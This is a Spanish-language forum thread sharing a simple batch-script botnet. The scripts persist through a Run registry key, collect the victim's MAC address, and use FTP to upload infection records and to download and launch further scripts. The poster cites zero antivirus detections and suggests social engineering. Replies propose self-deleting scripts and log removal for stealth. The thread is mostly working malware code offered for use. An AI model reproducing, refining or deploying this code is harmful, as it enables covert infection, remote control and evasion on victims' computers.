Botnet sencila [Batch]

Buenas a todos, vengo a traeros una botnet sencilla 'programada' entera con batch.

Son varios archivos, el primer archivo va a ser este, que lo que hace es descargarse el Fecha.bat (Encargado de contar los pcs y ejecutar el 3º archivo que será el que dé las ordenes definitivas). A este archivo se lo pueden añadir cosas como ingeniería social para engañar a alguien.

@echo off

cd C:\Users\%username%

set ruta=%CD%

rem Prepara el archivo que controla las máquinas infectadas.

set numero=%random%

echo %numero% > numero.txt

getmac > %numero%

del ftp.txt
echo open host >> ftp.txt
echo userdown >> ftp.txt
echo passdown >> ftp.txt
echo get Fecha.bat >> ftp.txt
echo quit >> ftp.txt

start /min ftp -s:ftp.txt

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v winReg32 /t REG_SZ /d %ruta%\Fecha.bat

SHA256: 14b4db4fcb1778e4ee709d200b1b60db91e5dde5062ca3abcab66233eaa35907 
Nombre: Malware.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 13:53:25 UTC ( hace 1 minuto ) 

El Segundo archivo sería el que se encarga de descargar e iniciar un tercer archivo que se ejecutaría, además contabiliza los pcs infectados.

@echo off

rem Crea un txt con la fecha y hora actual.

rem Lee el número del archivo numero.txt

for /f "tokens=*" %%x in (numero.txt) do (
set nombre=%%x
goto escribir
) 

:escribir

rem Escribe el archivo

echo ----------------- >> %nombre%
echo fecha: %date% >> %nombre%
echo hora: %time% >> %nombre%

rem Envía el archivo.

del ftp.txt
del ftp1.txt
echo open host >> ftp.txt
echo userfecha>> ftp.txt
echo passfecha>> ftp.txt
echo put %nombre% >> ftp.txt
echo quit >> ftp.txt

start /min ftp -s:ftp.txt

rem Ejecuta el archivo que he subido

echo open host >> ftp1.txt
echo userdown>> ftp1.txt
echo passdown>> ftp1.txt
echo get eject.bat >> ftp1.txt
echo quit >> ftp1.txt

start /min ftp -s:ftp1.txt

timeout /t 15

start eject.bat

SHA256: 62b766ad33d7bea8959d463b44909b0d37ba61963cd8ad1e32f57e4547954456 
Nombre: Fecha.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 14:04:47 UTC ( hace 0 minutos ) 

Los timeout los pongo porque el host que utilizo es lento,

En cuanto a las cuentas ftp hice dos y dos carpetas diferentes, una carpeta para las descargas, que solo pueda descargar, para eject.bat y fecha.bat y otra carpeta llamada Infectados con otra cuenta que solo puede subir archivos.

Acepto ideas y criticas

!Saludos¡

Nada mal @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, doy por hecho que lo has programado tu no?

Saludos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Nada mal @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, doy por hecho que lo has programado tu no?

Saludos.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta si, lo he programado yo, es sencillo pero puede servir.

Me encanta la idea y el programa!
No te estas dando cuenta pero de a poco vas programando modularmente un buen y completo troyano

muy bueno ROLLTH.
Como sugerencias e ideas, como tu mismo dijiste que aceptabas, se me ocurre
que un solo batch genere al resto de los demás batch, y así mismo los valla borrando junto con los logs que envía luego de haberlos enviado
de esa forma seria mas fácil la infección y menos sospechoso que quedaran logs sueltos

Muchas gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muchas gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

claro, que un solo batch valla generando el resto.
y a medida que cada batch secundario termine de ejecutarse se elimine.
así evitarías problemas.